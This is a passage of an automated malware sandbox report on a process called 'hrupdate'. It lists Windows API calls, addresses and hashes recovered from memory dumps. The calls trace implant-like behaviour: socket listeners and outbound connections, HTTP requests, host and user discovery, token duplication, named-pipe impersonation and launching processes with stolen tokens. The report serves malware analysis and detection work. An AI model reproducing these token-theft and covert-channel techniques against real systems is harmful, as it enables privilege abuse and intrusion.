                                                                • Source File: 00000000.00000003.1737791029.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_3_30d0000_hrupdate.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000003.1737791029.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_3_30d0000_hrupdate.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                APIs
                                                                • htonl.WS2_32(04FC389E), ref: 04FCC93C
                                                                • select.WS2_32(00000000,?,?,?,?), ref: 04FCC9A0
                                                                • __WSAFDIsSet.WS2_32(34E85900,?), ref: 04FCC9BC
                                                                • accept.WS2_32(34E85900,00000000,00000000), ref: 04FCC9D1
                                                                • ioctlsocket.WS2_32(00000000,8004667E,00000000), ref: 04FCC9E4
                                                                  • Part of subcall function 04FCC308: _malloc.LIBCMT ref: 04FCC30F
                                                                  • Part of subcall function 04FCC308: GetTickCount.KERNEL32 ref: 04FCC32F
                                                                  • Part of subcall function 04FC48BF: _malloc.LIBCMT ref: 04FC48C5
                                                                  • Part of subcall function 04FC490F: htonl.WS2_32(00000000), ref: 04FC4915
                                                                  • Part of subcall function 04FC4A58: _memset.LIBCMT ref: 04FC4A66
                                                                • __WSAFDIsSet.WS2_32(34E85900,?), ref: 04FCCA71
                                                                • accept.WS2_32(34E85900,00000000,00000000), ref: 04FCCA83
                                                                • closesocket.WS2_32(04FC389E), ref: 04FCCB91
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: _mallocaccepthtonl$CountTick_memsetclosesocketioctlsocketselect
                                                                • String ID: d
                                                                • API String ID: 4083423528-2564639436
                                                                APIs
                                                                • _memset.LIBCMT ref: 04FC5DE4
                                                                • _memset.LIBCMT ref: 04FC5DF9
                                                                • __snprintf.LIBCMT ref: 04FC5E65
                                                                • _memset.LIBCMT ref: 04FC5E73
                                                                • __snprintf.LIBCMT ref: 04FC5E8F
                                                                • __snprintf.LIBCMT ref: 04FC5EAE
                                                                • __snprintf.LIBCMT ref: 04FC5F4C
                                                                • __snprintf.LIBCMT ref: 04FC5F63
                                                                • HttpOpenRequestA.WININET(00000000,?,00000000,00000000,04FF656C,05009668), ref: 04FC5FA0
                                                                • HttpSendRequestA.WININET(00000000,?,?,?,?), ref: 04FC5FC9
                                                                • InternetCloseHandle.WININET(00000000), ref: 04FC5FDB
                                                                • Sleep.KERNEL32(000001F4), ref: 04FC5FE2
                                                                • InternetCloseHandle.WININET(00000000), ref: 04FC5FF3
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: __snprintf$_memset$CloseHandleHttpInternetRequest$OpenSendSleep
                                                                • String ID:
                                                                • API String ID: 3375730287-0
                                                                APIs
                                                                • GetTickCount.KERNEL32 ref: 04FCC712
                                                                • select.WS2_32(00000000,00000000,?,?,00000000), ref: 04FCC75D
                                                                • __WSAFDIsSet.WS2_32(?,?), ref: 04FCC76D
                                                                • __WSAFDIsSet.WS2_32(?,?), ref: 04FCC780
                                                                • GetTickCount.KERNEL32 ref: 04FCC789
                                                                • gethostbyname.WS2_32(?), ref: 04FCC794
                                                                • htons.WS2_32(?), ref: 04FCC7A7
                                                                • inet_addr.WS2_32(?), ref: 04FCC7B3
                                                                • sendto.WS2_32(?,00000000,?,00000000,?,00000010), ref: 04FCC7CD
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: CountTick$gethostbynamehtonsinet_addrselectsendto
                                                                • String ID: d
                                                                • API String ID: 1257931466-2564639436
                                                                APIs
                                                                  • Part of subcall function 04FCBF5F: _malloc.LIBCMT ref: 04FCBF65
                                                                  • Part of subcall function 04FCBF5F: _malloc.LIBCMT ref: 04FCBF75
                                                                • _memset.LIBCMT ref: 04FD02EC
                                                                  • Part of subcall function 04FD075D: _memset.LIBCMT ref: 04FD0859
                                                                • _malloc.LIBCMT ref: 04FD02FA
                                                                  • Part of subcall function 04FDDA1B: __FF_MSGBANNER.LIBCMT ref: 04FDDA3E
                                                                  • Part of subcall function 04FDDA1B: __NMSG_WRITE.LIBCMT ref: 04FDDA45
                                                                  • Part of subcall function 04FDDA1B: RtlAllocateHeap.NTDLL(00000000,?), ref: 04FDDA92
                                                                • _memset.LIBCMT ref: 04FD030C
                                                                  • Part of subcall function 04FD3B98: _malloc.LIBCMT ref: 04FD3BBF
                                                                  • Part of subcall function 04FD3B98: _memset.LIBCMT ref: 04FD3BED
                                                                  • Part of subcall function 04FD0871: _memset.LIBCMT ref: 04FD0950
                                                                • _malloc.LIBCMT ref: 04FD032F
                                                                • _memset.LIBCMT ref: 04FD0341
                                                                  • Part of subcall function 04FD3B98: _realloc.LIBCMT ref: 04FD3BCE
                                                                • htonl.WS2_32(00000000), ref: 04FD0372
                                                                • GetComputerNameExA.KERNEL32(00000006,?,?), ref: 04FD03DB
                                                                • GetComputerNameA.KERNEL32(04FCE6FF,?), ref: 04FD0408
                                                                • GetUserNameA.ADVAPI32(?,?), ref: 04FD0435
                                                                  • Part of subcall function 04FC6388: WSASocketA.WS2_32(00000002,00000002,00000000,00000000,00000000,00000000), ref: 04FC63AC
                                                                • _malloc.LIBCMT ref: 04FD0504
                                                                • _memset.LIBCMT ref: 04FD0591
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: _memset$_malloc$Name$Computer$AllocateHeapSocketUser_reallochtonl
                                                                • String ID:
                                                                • API String ID: 2958771099-0
                                                                APIs
                                                                • _memset.LIBCMT ref: 04FC7EC3
                                                                • _memset.LIBCMT ref: 04FC7EDF
                                                                  • Part of subcall function 04FC6635: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000400,04FC80F0,?,04FC7F09,04FC80F0,?,00000400), ref: 04FC664B
                                                                  • Part of subcall function 04FC6635: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,04FC80F0,04FC7F09,?,04FC7F09,04FC80F0,?,00000400,?,?,?,?,04FC80F0), ref: 04FC6664
                                                                • GetCurrentDirectoryW.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,04FC80F0,04FCD106,?,?,04FCD106,?), ref: 04FC7F29
                                                                • GetCurrentDirectoryW.KERNEL32(00000400,?,?,?,?,?,?,?,?,04FC80F0,04FCD106,?,?,04FCD106,?), ref: 04FC7F38
                                                                • CreateProcessWithTokenW.ADVAPI32(00000002,00000000,?,C0330CC4,00000000,?,C2E8296A,83FFFFD9), ref: 04FC7F6B
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: ByteCharCurrentDirectoryMultiWide_memset$CreateProcessTokenWith
                                                                • String ID:
                                                                • API String ID: 2486443368-0
                                                                APIs
                                                                • htonl.WS2_32 ref: 04FD3290
                                                                • htonl.WS2_32(?), ref: 04FD32A0
                                                                • GetLastError.KERNEL32 ref: 04FD32CC
                                                                • OpenProcessToken.ADVAPI32(00000000,00000000,00000008), ref: 04FD32F0
                                                                • GetLastError.KERNEL32 ref: 04FD32FA
                                                                • ImpersonateLoggedOnUser.ADVAPI32(00000008), ref: 04FD3319
                                                                • GetLastError.KERNEL32 ref: 04FD331F
                                                                • DuplicateTokenEx.ADVAPI32(00000008,02000000,00000000,00000003,00000001,05009F5C), ref: 04FD333E
                                                                • GetLastError.KERNEL32 ref: 04FD3348
                                                                • ImpersonateLoggedOnUser.ADVAPI32 ref: 04FD335A
                                                                • GetLastError.KERNEL32 ref: 04FD3360
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast$ImpersonateLoggedTokenUserhtonl$DuplicateOpenProcess
                                                                • String ID:
                                                                • API String ID: 332438066-0
                                                                APIs
                                                                • GetTickCount.KERNEL32 ref: 04FCB75D
                                                                • GetTickCount.KERNEL32 ref: 04FCB767
                                                                • GetLastError.KERNEL32 ref: 04FCB7C1
                                                                  • Part of subcall function 04FD2BBA: _memset.LIBCMT ref: 04FD2C43
                                                                • GetLastError.KERNEL32 ref: 04FCB783
                                                                • WaitNamedPipeA.KERNEL32(?,00002710), ref: 04FCB798
                                                                  • Part of subcall function 04FCB387: _memset.LIBCMT ref: 04FCB3A8
                                                                • Sleep.KERNEL32(000003E8), ref: 04FCB7A5
                                                                • GetTickCount.KERNEL32 ref: 04FCB7AB
                                                                • GetLastError.KERNEL32 ref: 04FCB7D1
                                                                • SetNamedPipeHandleState.KERNEL32(?,?,00000000,00000000), ref: 04FCB7EE
                                                                • GetLastError.KERNEL32 ref: 04FCB7F8
                                                                • DisconnectNamedPipe.KERNEL32(?), ref: 04FCB832
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast$CountNamedPipeTick$_memset$DisconnectHandleSleepStateWait
                                                                • String ID:
                                                                • API String ID: 3382687554-0
                                                                APIs
                                                                • GetTickCount.KERNEL32 ref: 04FCC64C
                                                                • select.WS2_32(00000000,00000000,?,?,00000000), ref: 04FCC69A
                                                                • __WSAFDIsSet.WS2_32(?,?), ref: 04FCC6AA
                                                                • __WSAFDIsSet.WS2_32(?,?), ref: 04FCC6BD
                                                                • send.WS2_32(?,00000000,?,00000000), ref: 04FCC6D1
                                                                • WSAGetLastError.WS2_32(?,00000000,?,00000000,?,?,?,?), ref: 04FCC6DB
                                                                • Sleep.KERNEL32(000003E8), ref: 04FCC6ED
                                                                • GetTickCount.KERNEL32 ref: 04FCC6F3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: CountTick$ErrorLastSleepselectsend
                                                                • String ID: d
                                                                • API String ID: 2152284305-2564639436
                                                                APIs
                                                                • htonl.WS2_32 ref: 04FCC54F
                                                                • htons.WS2_32(00000000), ref: 04FCC560
                                                                • socket.WS2_32(00000002,00000001,00000000), ref: 04FCC599
                                                                • closesocket.WS2_32(00000000), ref: 04FCC5A8
                                                                • gethostbyname.WS2_32(00000000), ref: 04FCC5C6
                                                                • htons.WS2_32(?), ref: 04FCC5F2
                                                                • ioctlsocket.WS2_32(00000000,8004667E,?), ref: 04FCC605
                                                                • connect.WS2_32(00000000,?,00000010), ref: 04FCC616
                                                                • WSAGetLastError.WS2_32(00000000,?,00000010), ref: 04FCC61F
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: htons$ErrorLastclosesocketconnectgethostbynamehtonlioctlsocketsocket
                                                                • String ID:
                                                                • API String ID: 3339321253-0
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: htonl$__vscwprintf_helper_malloc_memset_vswprintf_s_vwprintf
                                                                • String ID: 9
                                                                • API String ID: 1612592715-2366072709
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: CountErrorLastSleepTick$BuffersDisconnectFileFlushNamedPipe
                                                                • String ID:
                                                                • API String ID: 3377695601-0
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                                                                • String ID:
                                                                • API String ID: 3886058894-0
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: _memset$_malloc$_rand
                                                                • String ID:
                                                                • API String ID: 2453798774-0
                                                                APIs
                                                                • __time64.LIBCMT ref: 04FD0BC8
                                                                  • Part of subcall function 04FDDC25: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,04FD0BCD,00000000,00000080,00000000,00000000,?,?,?,04FC35CD,?,00000000,00000000), ref: 04FDDC30
                                                                  • Part of subcall function 04FDDC25: __aulldiv.LIBCMT ref: 04FDDC50
                                                                  • Part of subcall function 04FDDFA9: __getptd.LIBCMT ref: 04FDDFAE
                                                                • _malloc.LIBCMT ref: 04FD0C0F
                                                                • _memset.LIBCMT ref: 04FD0C1C
                                                                • _strtok.LIBCMT ref: 04FD0C36
                                                                • _strncpy.LIBCMT ref: 04FD0C6E
                                                                • _strncpy.LIBCMT ref: 04FD0C96
                                                                • _strtok.LIBCMT ref: 04FD0CA2
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: Time_strncpy_strtok$FileSystem__aulldiv__getptd__time64_malloc_memset
                                                                • String ID:
                                                                • API String ID: 3612108075-0
                                                                APIs
                                                                • GetLastError.KERNEL32 ref: 04FD37E8
                                                                • OpenProcessToken.ADVAPI32(00000000,?,00000000), ref: 04FD3806
                                                                • GetLastError.KERNEL32 ref: 04FD3810
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast$OpenProcessToken
                                                                • String ID:
                                                                • API String ID: 2009710997-0
                                                                APIs
                                                                • _memset.LIBCMT ref: 04FC7757
                                                                • GetLastError.KERNEL32 ref: 04FC776A
                                                                • ConnectNamedPipe.KERNEL32(00000000), ref: 04FC777E
                                                                • ImpersonateNamedPipeClient.ADVAPI32 ref: 04FC77A9
                                                                • GetCurrentThread.KERNEL32 ref: 04FC77BE
                                                                • OpenThreadToken.ADVAPI32(00000000), ref: 04FC77C5
                                                                • DisconnectNamedPipe.KERNEL32(9F7C69F4), ref: 04FC77D9
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: NamedPipe$Thread$ClientConnectCurrentDisconnectErrorImpersonateLastOpenToken_memset
                                                                • String ID:
                                                                • API String ID: 3598867581-0
                                                                APIs
                                                                • GetTickCount.KERNEL32 ref: 04FCB9F1
                                                                • ioctlsocket.WS2_32(?,8004667E,?), ref: 04FCBA15
                                                                • GetTickCount.KERNEL32 ref: 04FCBA4C
                                                                • ioctlsocket.WS2_32(00000000,8004667E,00000000), ref: 04FCBA71
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: CountTickioctlsocket
                                                                • String ID:
                                                                • API String ID: 3686034022-0
                                                                • Opcode ID: 392131720c1807619be52301bcaf7c93c2141d925671ba5d3cbdc6a6d49227d4
                                                                • Instruction ID: d241ea2ec8a437e8bd4569225cfd6e79758355311e9dba925580775bda35be92
                                                                • Opcode Fuzzy Hash: 392131720c1807619be52301bcaf7c93c2141d925671ba5d3cbdc6a6d49227d4
                                                                • Instruction Fuzzy Hash: 8A11A37695010DBFEB008FA0EC45BED7BACEF00765F008025FD45D6090DB78BA459B62
                                                                APIs
                                                                • ?_Xlength_error@std@@YAXPBD@Z.MSVCP140(string too long,00B02864,00000000,?,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00B02A15
                                                                • _Mtx_unlock.MSVCP140(?,21DC2236,?,00000000,00000000,00B03E90,000000FF), ref: 00B02A66
                                                                • ?_Throw_C_error@std@@YAXH@Z.MSVCP140(00000000), ref: 00B02A74
                                                                • _Mtx_destroy.MSVCP140(?), ref: 00B02A7E
                                                                • _Cnd_destroy.MSVCP140(?,?,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00B02A88
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2942621894.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                • Associated: 00000000.00000002.2942591861.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2942653485.0000000000B04000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2942691161.0000000000B06000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2942715689.0000000000B07000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2942715689.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_b00000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: C_error@std@@Cnd_destroyMtx_destroyMtx_unlockThrow_Xlength_error@std@@
                                                                • String ID: string too long
                                                                • API String ID: 1781926451-2556327735
                                                                • Opcode ID: 23d9c026dbc7f27fdbe2fde26df8a43885fd94b90bf731b408179e1a32e762bf
                                                                • Instruction ID: ed7728ae9ee092d48b68cf4b1d27c5d9ced92a105ede35fe05dcf57d477e3296
                                                                • Opcode Fuzzy Hash: 23d9c026dbc7f27fdbe2fde26df8a43885fd94b90bf731b408179e1a32e762bf
                                                                • Instruction Fuzzy Hash: B001B5B1900604EBD7109B54EC09B5B7BECEF05724F044579FB16E3790EF35A91887A5
                                                                APIs
                                                                • _memset.LIBCMT ref: 04FCE339
                                                                  • Part of subcall function 04FC48BF: _malloc.LIBCMT ref: 04FC48C5
                                                                • GetCurrentProcess.KERNEL32 ref: 04FCE384
                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 04FCE3B9
                                                                • Process32First.KERNEL32(00000000,?), ref: 04FCE3DB
                                                                  • Part of subcall function 04FC490F: htonl.WS2_32(00000000), ref: 04FC4915
                                                                • Process32Next.KERNEL32(00000000,00000128), ref: 04FCE4BE
                                                                  • Part of subcall function 04FCE2AA: OpenProcessToken.ADVAPI32(?,00000008,?), ref: 04FCE2B7
                                                                • ProcessIdToSessionId.KERNEL32(?,?,?,00000002,00000000), ref: 04FCE463
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: Process$Process32$CreateCurrentFirstNextOpenSessionSnapshotTokenToolhelp32_malloc_memsethtonl
                                                                • String ID:
                                                                • API String ID: 3674674043-0
                                                                • Opcode ID: 8bf9552a858bc2318ec333ea176e3b882181de349b4bc6b8c341cd4bfbf53bff
                                                                • Instruction ID: 051c74c6bbce7fa945f00580f835c24a89fae0f852b8eb6f0527090b81aee91d
                                                                • Opcode Fuzzy Hash: 8bf9552a858bc2318ec333ea176e3b882181de349b4bc6b8c341cd4bfbf53bff
                                                                • Instruction Fuzzy Hash: A5516872D0421BAAFF21ABE09D45FEF7BBCDF04319F100059E608E2150EA35B6478B95
                                                                APIs
                                                                  • Part of subcall function 04FCE2E8: GetCurrentProcess.KERNEL32(?,04FC9F55,?,04FC9FAD), ref: 04FCE2F4
                                                                • GetLastError.KERNEL32(?,?,?,04FCD106,00000000), ref: 04FC7C85
                                                                • _malloc.LIBCMT ref: 04FC7CF4
                                                                • _memset.LIBCMT ref: 04FC7D03
                                                                • _memset.LIBCMT ref: 04FC7D34
                                                                • GetLastError.KERNEL32 ref: 04FC7D62
                                                                • _memset.LIBCMT ref: 04FC7D77
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: _memset$ErrorLast$CurrentProcess_malloc
                                                                • String ID:
                                                                • API String ID: 2196066725-0
                                                                • Opcode ID: 22ead761a0adf3e1ec90099f95783a74f7fd12e851408f4e08a59c2c885fb25d
                                                                • Instruction ID: 0deca970a44cd2e487fdee136b644d4fd2670695552012fba5e1ad059028dbe8
                                                                • Opcode Fuzzy Hash: 22ead761a0adf3e1ec90099f95783a74f7fd12e851408f4e08a59c2c885fb25d
                                                                • Instruction Fuzzy Hash: 3D41AEA690010BBEFB10BBE5DD41EBFB3BDDF04658F040069FA44D1081EA76A952DB76
                                                                APIs
                                                                  • Part of subcall function 04FCBF5F: _malloc.LIBCMT ref: 04FCBF65
                                                                  • Part of subcall function 04FCBF5F: _malloc.LIBCMT ref: 04FCBF75
                                                                • _memset.LIBCMT ref: 04FC8203
                                                                • GetStartupInfoA.KERNEL32(?), ref: 04FC821B
                                                                  • Part of subcall function 04FC6635: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000400,04FC80F0,?,04FC7F09,04FC80F0,?,00000400), ref: 04FC664B
                                                                  • Part of subcall function 04FC6635: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,04FC80F0,04FC7F09,?,04FC7F09,04FC80F0,?,00000400,?,?,?,?,04FC80F0), ref: 04FC6664
                                                                • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 04FC8280
                                                                • GetCurrentDirectoryW.KERNEL32(00000400,?), ref: 04FC828A
                                                                • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000001,00000000,00000000,00000000,00000000,00000000,?,04FC673C), ref: 04FC82B5
                                                                • GetLastError.KERNEL32 ref: 04FC82C4
                                                                  • Part of subcall function 04FC5B06: _vswprintf_s.LIBCMT ref: 04FC5B22
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: ByteCharCurrentDirectoryMultiWide_malloc$CreateErrorInfoLastLogonProcessStartupWith_memset_vswprintf_s
                                                                • String ID:
                                                                • API String ID: 963358868-0
                                                                • Opcode ID: 6883fa6f1bb7b8e4aaf8631a50f509be6502bf58d81b26b3580abfd6ae75d0d8
                                                                • Instruction ID: 0955a9398cb6787150297bef45048d46671f2b003dfc8beae11cbeae05eb7dc8
                                                                • Opcode Fuzzy Hash: 6883fa6f1bb7b8e4aaf8631a50f509be6502bf58d81b26b3580abfd6ae75d0d8
                                                                • Instruction Fuzzy Hash: 32417F71D00209BBEF01AFE6DD48EDFBFB9EF88354F000019F608A6160D675A912DB61
                                                                APIs
                                                                • GetNamedPipeInfo.KERNELBASE(?,00000000,?,00000000,00000000), ref: 04FCB11C
                                                                • SetNamedPipeHandleState.KERNEL32(?,00000001,00000000,00000000), ref: 04FCB133
                                                                • Sleep.KERNEL32(000001F4), ref: 04FCB189
                                                                • GetLastError.KERNEL32 ref: 04FCB1A2
                                                                • SetNamedPipeHandleState.KERNEL32(?,00000001,00000000,00000000), ref: 04FCB1BE
                                                                • GetLastError.KERNEL32 ref: 04FCB1C8
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: NamedPipe$ErrorHandleLastState$InfoSleep
                                                                • String ID:
                                                                • API String ID: 1433407474-0
                                                                • Opcode ID: 72f99232b0af8308c0375ee75c2ea2643b7730e09894c0f6faa03cb214b390d6
                                                                • Instruction ID: 0d2d5ed15969a2379a864b95f2fe8e482253f36a9c731d2ed30f1c6cfa7825de
                                                                • Opcode Fuzzy Hash: 72f99232b0af8308c0375ee75c2ea2643b7730e09894c0f6faa03cb214b390d6
                                                                • Instruction Fuzzy Hash: ED315DB6D0420AEFEF10DF95ED869BEB7BDFF04305B10446EE501A2140E630BA86CB61
                                                                APIs
                                                                • GetLastError.KERNEL32 ref: 04FCD306
                                                                • UpdateProcThreadAttribute.KERNELBASE(00000000,00000000,00020000,?,00000004,00000000,00000000), ref: 04FCD334
                                                                • GetLastError.KERNEL32 ref: 04FCD33E
                                                                • GetCurrentProcess.KERNEL32(00000000,?,?,00000000,00000001,00000003), ref: 04FCD376
                                                                • GetCurrentProcess.KERNEL32(00000000,?,?,00000000,00000001,00000003), ref: 04FCD39E
                                                                • GetCurrentProcess.KERNEL32(00000000,?,?,00000000,00000001,00000003), ref: 04FCD3BD
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: CurrentProcess$ErrorLast$AttributeProcThreadUpdate
                                                                • String ID:
                                                                • API String ID: 1014270282-0
                                                                • Opcode ID: e2ab51d6e893eb867d36b62f4a430cc24a3017c8b0463a31aa13dee092d7fe9e
                                                                • Instruction ID: cd63dd8f5f0aae6dab839801a1aa297a6bd2703851ab79abf0a1e8aae686561f
                                                                • Opcode Fuzzy Hash: e2ab51d6e893eb867d36b62f4a430cc24a3017c8b0463a31aa13dee092d7fe9e
                                                                • Instruction Fuzzy Hash: 6621B671A00316BBEF216F919D89F6F3F6DEF44750F140428F604DA180D675A902D6F1
                                                                APIs
                                                                • accept.WS2_32(?,00000000,00000000), ref: 030D0A19
                                                                • recv.WS2_32(?,?,00000001,00000002), ref: 030D0A44
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943261840.00000000030D0000.00000020.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_30d0000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: acceptrecv
                                                                • String ID:
                                                                • API String ID: 1078442044-0
                                                                • Opcode ID: 6e962035ec25cf2fbf3ac19bd4c125f38f0688742753830840ed1eef832f9458
                                                                • Instruction ID: 0714332ce589f33ef4ab701d4945f86aee8a779c80960117a6394586b619a233
